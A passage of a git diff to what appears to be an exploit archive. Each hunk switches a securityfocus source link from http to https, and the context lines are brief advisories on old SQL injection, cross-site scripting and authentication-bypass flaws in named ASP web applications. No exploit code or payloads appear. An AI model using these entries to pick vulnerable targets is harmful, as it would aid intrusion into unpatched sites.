vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software. diff --git a/exploits/asp/webapps/23729.txt b/exploits/asp/webapps/23729.txt index 69e67f4fd..202665f79 100644 --- a/exploits/asp/webapps/23729.txt +++ b/exploits/asp/webapps/23729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9693/info +source: https://www.securityfocus.com/bid/9693/info It has been reported that WebStores2000 is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/asp/webapps/23791.txt b/exploits/asp/webapps/23791.txt index 73fe5bdd4..4cecfedcf 100644 --- a/exploits/asp/webapps/23791.txt +++ b/exploits/asp/webapps/23791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9799/info +source: https://www.securityfocus.com/bid/9799/info Multiple vulnerabilities have been identified in the application that may allow an attacker to obtain the private cryptographic key and gain access to sensitive information. The application is also reported prone to an SQL injection vulnerability that may allow an attacker to gain administrative level access to the underlying database. diff --git a/exploits/asp/webapps/23813.txt b/exploits/asp/webapps/23813.txt index ae45f2c20..0bc176aeb 100644 --- a/exploits/asp/webapps/23813.txt +++ b/exploits/asp/webapps/23813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9876/info +source: https://www.securityfocus.com/bid/9876/info It has been reported that the VGW4/8 Telephony Gateway is prone to a remote authentication bypass vulnerability via its web configuration tool. The problem is due to a design error in the application that allows a user to access configuration pages without prior authentication. diff --git a/exploits/asp/webapps/23851.txt b/exploits/asp/webapps/23851.txt index 901115584..cd2765bdb 100644 --- a/exploits/asp/webapps/23851.txt +++ b/exploits/asp/webapps/23851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9931/info +source: https://www.securityfocus.com/bid/9931/info It has been reported that Member Management System may be prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The problem is reported to exist in the 'ID' parameter contained within the 'resend.asp' and 'news_view.asp' scripts. diff --git a/exploits/asp/webapps/23852.txt b/exploits/asp/webapps/23852.txt index 8968cdf3f..6cbc37243 100644 --- a/exploits/asp/webapps/23852.txt +++ b/exploits/asp/webapps/23852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9931/info +source: https://www.securityfocus.com/bid/9931/info It has been reported that Member Management System may be prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The problem is reported to exist in the 'ID' parameter contained within the 'resend.asp' and 'news_view.asp' scripts. diff --git a/exploits/asp/webapps/23853.txt b/exploits/asp/webapps/23853.txt index 7c1300b60..2d8b78908 100644 --- a/exploits/asp/webapps/23853.txt +++ b/exploits/asp/webapps/23853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9932/info +source: https://www.securityfocus.com/bid/9932/info It has been reported that a number of Member Management System scripts are prone to cross-site scripting vulnerabilities. These issues are reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. The issues are reported to affect the 'err' parameter of 'error.asp' script and the 'register.asp' script. diff --git a/exploits/asp/webapps/23854.txt b/exploits/asp/webapps/23854.txt index 2561fc268..35d4f0e29 100644 --- a/exploits/asp/webapps/23854.txt +++ b/exploits/asp/webapps/23854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9932/info +source: https://www.securityfocus.com/bid/9932/info It has been reported that a number of Member Management System scripts are prone to cross-site scripting vulnerabilities. These issues are reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. The issues are reported to affect the 'err' parameter of 'error.asp' script and the 'register.asp' script. diff --git a/exploits/asp/webapps/23857.txt b/exploits/asp/webapps/23857.txt index 37dbd09d9..0a9d882cc 100644 --- a/exploits/asp/webapps/23857.txt +++ b/exploits/asp/webapps/23857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23858.txt b/exploits/asp/webapps/23858.txt index 4aa122b4f..d815b7b97 100644 --- a/exploits/asp/webapps/23858.txt +++ b/exploits/asp/webapps/23858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23859.txt b/exploits/asp/webapps/23859.txt index eca6106a8..c2c4102ae 100644 --- a/exploits/asp/webapps/23859.txt +++ b/exploits/asp/webapps/23859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23860.txt b/exploits/asp/webapps/23860.txt index be53265d9..c2375b158 100644 --- a/exploits/asp/webapps/23860.txt +++ b/exploits/asp/webapps/23860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23861.txt b/exploits/asp/webapps/23861.txt index 93c1c9060..ec2c4d6fa 100644 --- a/exploits/asp/webapps/23861.txt +++ b/exploits/asp/webapps/23861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23862.txt b/exploits/asp/webapps/23862.txt index 9dbf30048..706359a06 100644 --- a/exploits/asp/webapps/23862.txt +++ b/exploits/asp/webapps/23862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23863.txt b/exploits/asp/webapps/23863.txt index 144dc53f2..02064b901 100644 --- a/exploits/asp/webapps/23863.txt +++ b/exploits/asp/webapps/23863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23891.txt b/exploits/asp/webapps/23891.txt index c477ea24c..faef3588c 100644 --- a/exploits/asp/webapps/23891.txt +++ b/exploits/asp/webapps/23891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9997/info +source: https://www.securityfocus.com/bid/9997/info Reportedly A-Cart is prone to multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input prior to its use in SQL queries and generation of dynamic content. diff --git a/exploits/asp/webapps/23895.txt b/exploits/asp/webapps/23895.txt index 52d38127c..2d2ba2170 100644 --- a/exploits/asp/webapps/23895.txt +++ b/exploits/asp/webapps/23895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10005/info +source: https://www.securityfocus.com/bid/10005/info It has been reported that Interchange may be prone to a remote information disclosure vulnerability allowing attackers to disclose contents of arbitrary variables via URI requests. diff --git a/exploits/asp/webapps/23898.txt b/exploits/asp/webapps/23898.txt index 7567e6053..e4db07aeb 100644 --- a/exploits/asp/webapps/23898.txt +++ b/exploits/asp/webapps/23898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10019/info +source: https://www.securityfocus.com/bid/10019/info Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query. diff --git a/exploits/asp/webapps/23899.txt b/exploits/asp/webapps/23899.txt index b53fe8ad1..87b428a6a 100644 --- a/exploits/asp/webapps/23899.txt +++ b/exploits/asp/webapps/23899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10020/info +source: https://www.securityfocus.com/bid/10020/info Reportedly CactuShop is prone to a remote cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input. diff --git a/exploits/asp/webapps/24039.txt b/exploits/asp/webapps/24039.txt index 4e81112cb..4cd7440f8 100644 --- a/exploits/asp/webapps/24039.txt +++ b/exploits/asp/webapps/24039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10194/info +source: https://www.securityfocus.com/bid/10194/info Reportedly NewsTraXor is affected by a remote database disclosure vulnerability. This issue is due to a design error that allows the database file to be globally readable. diff --git a/exploits/asp/webapps/24049.txt b/exploits/asp/webapps/24049.txt index 4d7081867..7e82a865e 100644 --- a/exploits/asp/webapps/24049.txt +++ b/exploits/asp/webapps/24049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10208/info +source: https://www.securityfocus.com/bid/10208/info It has been reported that Modular Site Management System may be prone to an information disclosure issue that could allow an attacker to gain access to a server's configuration information. diff --git a/exploits/asp/webapps/24184.txt b/exploits/asp/webapps/24184.txt index f16ce0244..99b133c26 100644 --- a/exploits/asp/webapps/24184.txt +++ b/exploits/asp/webapps/24184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10506/info +source: https://www.securityfocus.com/bid/10506/info AspDotNetStorefront is reportedly prone to an access validation vulnerability that may allow a remote attacker to delete arbitrary contents from a vulnerable Web site. The issue occurs because the 'deleteicon.aspx' script does not validate access before allowing an unprivileged user to delete contents such as icons and images from the site. diff --git a/exploits/asp/webapps/24185.txt b/exploits/asp/webapps/24185.txt index 68f527940..ba99dd2d5 100644 --- a/exploits/asp/webapps/24185.txt +++ b/exploits/asp/webapps/24185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10507/info +source: https://www.securityfocus.com/bid/10507/info AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks. diff --git a/exploits/asp/webapps/24198.txt b/exploits/asp/webapps/24198.txt index a4064be2f..6893ebf51 100644 --- a/exploits/asp/webapps/24198.txt +++ b/exploits/asp/webapps/24198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10534/info +source: https://www.securityfocus.com/bid/10534/info A vulnerability exists in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data in the 'shoperror.asp' script. diff --git a/exploits/asp/webapps/24214.txt b/exploits/asp/webapps/24214.txt index 0e25a35f9..e916713ce 100644 --- a/exploits/asp/webapps/24214.txt +++ b/exploits/asp/webapps/24214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10555/info +source: https://www.securityfocus.com/bid/10555/info A vulnerability exists in the Web Wiz Forums software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data passed to the 'registration_rules.asp' script. diff --git a/exploits/asp/webapps/24260.txt b/exploits/asp/webapps/24260.txt index 5370bd303..a8d8ed747 100644 --- a/exploits/asp/webapps/24260.txt +++ b/exploits/asp/webapps/24260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10674/info +source: https://www.securityfocus.com/bid/10674/info Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order. diff --git a/exploits/asp/webapps/24261.txt b/exploits/asp/webapps/24261.txt index 83d089d6f..9236f46e0 100644 --- a/exploits/asp/webapps/24261.txt +++ b/exploits/asp/webapps/24261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10674/info +source: https://www.securityfocus.com/bid/10674/info Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order. diff --git a/exploits/asp/webapps/24298.pl b/exploits/asp/webapps/24298.pl index 1cbff3a20..ab252ec45 100755 --- a/exploits/asp/webapps/24298.pl +++ b/exploits/asp/webapps/24298.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10771/info +source: https://www.securityfocus.com/bid/10771/info An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. diff --git a/exploits/asp/webapps/24299.pl b/exploits/asp/webapps/24299.pl index 3f78541d2..9a44946d3 100755 --- a/exploits/asp/webapps/24299.pl +++ b/exploits/asp/webapps/24299.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10772/info +source: https://www.securityfocus.com/bid/10772/info An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. diff --git a/exploits/asp/webapps/24300.pl b/exploits/asp/webapps/24300.pl index 857414ad2..7ddfbf8c4 100755 --- a/exploits/asp/webapps/24300.pl +++ b/exploits/asp/webapps/24300.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10773/info +source: https://www.securityfocus.com/bid/10773/info LBE Web HelpDesk is reported susceptible to an SQL injection vulnerability. This issue is due to improper sanitization of user-supplied data. diff --git a/exploits/asp/webapps/24302.pl b/exploits/asp/webapps/24302.pl index edef47697..39a6f2188 100755 --- a/exploits/asp/webapps/24302.pl +++ b/exploits/asp/webapps/24302.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10775/info +source: https://www.securityfocus.com/bid/10775/info Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based entirely on the values read from a cookie that is saved on the client system. An attacker may modify values in the appropriate cookie to gain administrative access to the affected software. diff --git a/exploits/asp/webapps/24313.txt b/exploits/asp/webapps/24313.txt index f62975f02..80b47d45a 100644 --- a/exploits/asp/webapps/24313.txt +++ b/exploits/asp/webapps/24313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24314.txt b/exploits/asp/webapps/24314.txt index 15a644826..2656aaf5b 100644 --- a/exploits/asp/webapps/24314.txt +++ b/exploits/asp/webapps/24314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24315.txt b/exploits/asp/webapps/24315.txt index 50ba4cbb6..ef601ab91 100644 --- a/exploits/asp/webapps/24315.txt +++ b/exploits/asp/webapps/24315.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24316.txt b/exploits/asp/webapps/24316.txt index ac8d2e4f5..f498eea18 100644 --- a/exploits/asp/webapps/24316.txt +++ b/exploits/asp/webapps/24316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24317.txt b/exploits/asp/webapps/24317.txt index 7c64ae4a0..e8890f2fe 100644 --- a/exploits/asp/webapps/24317.txt +++ b/exploits/asp/webapps/24317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24368.txt b/exploits/asp/webapps/24368.txt index 8a3393c2e..2925ac49d 100644 --- a/exploits/asp/webapps/24368.txt +++ b/exploits/asp/webapps/24368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24369.txt b/exploits/asp/webapps/24369.txt index dd84f1930..7af6f201b 100644 --- a/exploits/asp/webapps/24369.txt +++ b/exploits/asp/webapps/24369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24370.txt b/exploits/asp/webapps/24370.txt index da51befa9..185ca4f75 100644 --- a/exploits/asp/webapps/24370.txt +++ b/exploits/asp/webapps/24370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24371.txt b/exploits/asp/webapps/24371.txt index 0e2e986c8..24dd33453 100644 --- a/exploits/asp/webapps/24371.txt +++ b/exploits/asp/webapps/24371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24385.txt b/exploits/asp/webapps/24385.txt index c7eb7545f..bcd3be972 100644 --- a/exploits/asp/webapps/24385.txt +++ b/exploits/asp/webapps/24385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10982/info +source: https://www.securityfocus.com/bid/10982/info Zixforum is reported prone to a database disclosure vulnerability. It is reported that remote users may download the database file ''ZixForum.mdb' and gain access to sensitive information including unencrypted authentication credentials. diff --git a/exploits/asp/webapps/24397.txt b/exploits/asp/webapps/24397.txt index 9401a197c..ca88e9520 100644 --- a/exploits/asp/webapps/24397.txt +++ b/exploits/asp/webapps/24397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11004/info +source: https://www.securityfocus.com/bid/11004/info CNU5 is reported prone to a database disclosure vulnerability. It is reported that remote users may download the database file 'news.mdb' and gain access to sensitive information including unencrypted authentication credentials. diff --git a/exploits/asp/webapps/24420.txt b/exploits/asp/webapps/24420.txt index 9128e9b40..d84f0b92f 100644 --- a/exploits/asp/webapps/24420.txt +++ b/exploits/asp/webapps/24420.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11073/info +source: https://www.securityfocus.com/bid/11073/info Password Protect is reported prone to a multiple cross-site scripting and SQL injection vulnerabilities. These issues occur due to insufficient sanitization of user-supplied input. Successful exploitation of these issues may result in arbitrary HTML and script code execution and/or compromise of the underlying database. diff --git a/exploits/asp/webapps/24422.txt b/exploits/asp/webapps/24422.txt index c931401a7..7705a20ec 100644 --- a/exploits/asp/webapps/24422.txt +++ b/exploits/asp/webapps/24422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11083/info +source: https://www.securityfocus.com/bid/11083/info Comersus Cart is reported prone to a HTTP response splitting vulnerability. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted. This could aid in various attacks, which try to entice client users into a false sense of trust. diff --git a/exploits/asp/webapps/24588.txt b/exploits/asp/webapps/24588.txt index 59dfed376..f8ad97114 100644 --- a/exploits/asp/webapps/24588.txt +++ b/exploits/asp/webapps/24588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11149/info +source: https://www.securityfocus.com/bid/11149/info Reportedly getSolutions getIntranet is affected by multiple remote input validation vulnerabilities. These issues are caused by a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/24589.txt b/exploits/asp/webapps/24589.txt index 71aa7edd5..616cb20da 100644 --- a/exploits/asp/webapps/24589.txt +++ b/exploits/asp/webapps/24589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11150/info +source: https://www.securityfocus.com/bid/11150/info getInternet is vulnerable to multiple remote SQL injection vulnerabilities in the 'welcome.asp', 'checklogin.asp', and 'lostpassword.asp' scripts. These issues are due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. diff --git a/exploits/asp/webapps/24604.txt b/exploits/asp/webapps/24604.txt index c70647450..62b7373e0 100644 --- a/exploits/asp/webapps/24604.txt +++ b/exploits/asp/webapps/24604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11201/info +source: https://www.securityfocus.com/bid/11201/info Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled. diff --git a/exploits/asp/webapps/24625.txt b/exploits/asp/webapps/24625.txt index 71ba59782..2c6dca4c0 100644 --- a/exploits/asp/webapps/24625.txt +++ b/exploits/asp/webapps/24625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11250/info +source: https://www.securityfocus.com/bid/11250/info Reportedly BroadBoard Message Board is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI input prior to using it in an SQL query. diff --git a/exploits/asp/webapps/24626.txt b/exploits/asp/webapps/24626.txt index 5fd746fd3..1d9310a73 100644 --- a/exploits/asp/webapps/24626.txt +++ b/exploits/asp/webapps/24626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11250/info +source: https://www.securityfocus.com/bid/11250/info Reportedly BroadBoard Message Board is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI input prior to using it in an SQL query. diff --git a/exploits/asp/webapps/24631.txt b/exploits/asp/webapps/24631.txt index 4f141e001..2a1b65fc1 100644 --- a/exploits/asp/webapps/24631.txt +++ b/exploits/asp/webapps/24631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11253/info +source: https://www.securityfocus.com/bid/11253/info MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks. diff --git a/exploits/asp/webapps/24632.txt b/exploits/asp/webapps/24632.txt index a8feced6f..7257a70be 100644 --- a/exploits/asp/webapps/24632.txt +++ b/exploits/asp/webapps/24632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11253/info +source: https://www.securityfocus.com/bid/11253/info MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks. diff --git a/exploits/asp/webapps/24633.txt b/exploits/asp/webapps/24633.txt index 20f4d6c67..f3a4b7d22 100644 --- a/exploits/asp/webapps/24633.txt +++ b/exploits/asp/webapps/24633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11253/info +source: https://www.securityfocus.com/bid/11253/info MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks. diff --git a/exploits/asp/webapps/24666.txt b/exploits/asp/webapps/24666.txt index 624ac736d..18fc1b364 100644 --- a/exploits/asp/webapps/24666.txt +++ b/exploits/asp/webapps/24666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11342/info +source: https://www.securityfocus.com/bid/11342/info Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests. diff --git a/exploits/asp/webapps/24670.txt b/exploits/asp/webapps/24670.txt index 1f8618028..827139584 100644 --- a/exploits/asp/webapps/24670.txt +++ b/exploits/asp/webapps/24670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11361/info +source: https://www.securityfocus.com/bid/11361/info GoSmart Message Board is reported prone to multiple input validation vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting and SQL injection attacks. The cause of these issue is insufficient sanitization of user-supplied data. diff --git a/exploits/asp/webapps/24671.txt b/exploits/asp/webapps/24671.txt index 6d3d278f9..d2580110f 100644 --- a/exploits/asp/webapps/24671.txt +++ b/exploits/asp/webapps/24671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24672.txt b/exploits/asp/webapps/24672.txt index 52d2427df..27bf3c52e 100644 --- a/exploits/asp/webapps/24672.txt +++ b/exploits/asp/webapps/24672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24673.txt b/exploits/asp/webapps/24673.txt index 8450a38b7..f37036d71 100644 --- a/exploits/asp/webapps/24673.txt +++ b/exploits/asp/webapps/24673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24674.txt b/exploits/asp/webapps/24674.txt index 1368e675b..86671fb40 100644 --- a/exploits/asp/webapps/24674.txt +++ b/exploits/asp/webapps/24674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24675.txt b/exploits/asp/webapps/24675.txt index 46f987b00..ff73e7c4c 100644 --- a/exploits/asp/webapps/24675.txt +++ b/exploits/asp/webapps/24675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24717.txt b/exploits/asp/webapps/24717.txt index 02d7ff25d..1c34d8720 100644 --- a/exploits/asp/webapps/24717.txt +++ b/exploits/asp/webapps/24717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11586/info +source: https://www.securityfocus.com/bid/11586/info Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacker can execute arbitrary HTML and script code in a user's browser. Manipulation of SQL queries to reveal or corrupt sensitive database data is possible as well. diff --git a/exploits/asp/webapps/24838.txt b/exploits/asp/webapps/24838.txt index 29a515b88..5b80dde30 100644 --- a/exploits/asp/webapps/24838.txt +++ b/exploits/asp/webapps/24838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11931/info +source: https://www.securityfocus.com/bid/11931/info ASP Calendar is reported prone to an unauthorized administrative access vulnerability. An unauthorized remote attacker can access an administrative script and potentially gain administrative access to the application. diff --git a/exploits/asp/webapps/24840.txt b/exploits/asp/webapps/24840.txt index ef17081aa..fae2f1357 100644 --- a/exploits/asp/webapps/24840.txt +++ b/exploits/asp/webapps/24840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11933/info +source: https://www.securityfocus.com/bid/11933/info A remote SQL injection vulnerability reportedly affects ASP-Rider Web blog. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25060.txt b/exploits/asp/webapps/25060.txt index 98d1f4b16..40e442755 100644 --- a/exploits/asp/webapps/25060.txt +++ b/exploits/asp/webapps/25060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12362/info +source: https://www.securityfocus.com/bid/12362/info Comersus Cart is reportedly affected by multiple vulnerabilities. There is a possiblity of gaining administrator access due to a failure of the application to remove an installation script after install. There is the possiblity of SQL injection by passing a malicious HTTP referer header. There are also some possible cross-site scripting issues. diff --git a/exploits/asp/webapps/25078.txt b/exploits/asp/webapps/25078.txt index dd69f1bf3..c264611ff 100644 --- a/exploits/asp/webapps/25078.txt +++ b/exploits/asp/webapps/25078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12420/info +source: https://www.securityfocus.com/bid/12420/info Reportedly Eurofull E-Commerce is affected by a cross-site scripting vulnerability in the 'mensresp.asp' script. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/25084.txt b/exploits/asp/webapps/25084.txt index e23e986bb..b6a036ecb 100644 --- a/exploits/asp/webapps/25084.txt +++ b/exploits/asp/webapps/25084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12459/info +source: https://www.securityfocus.com/bid/12459/info A remote URI-redirection vulnerability affects Microsoft Outlook Web Access. This issue occurs because the application fails to properly sanitize URI-supplied data. diff --git a/exploits/asp/webapps/25110.txt b/exploits/asp/webapps/25110.txt index f3a828ddf..080e939b4 100644 --- a/exploits/asp/webapps/25110.txt +++ b/exploits/asp/webapps/25110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12574/info +source: https://www.securityfocus.com/bid/12574/info It is reported that ASP.NET is prone to various cross-site scripting attacks. These issues when 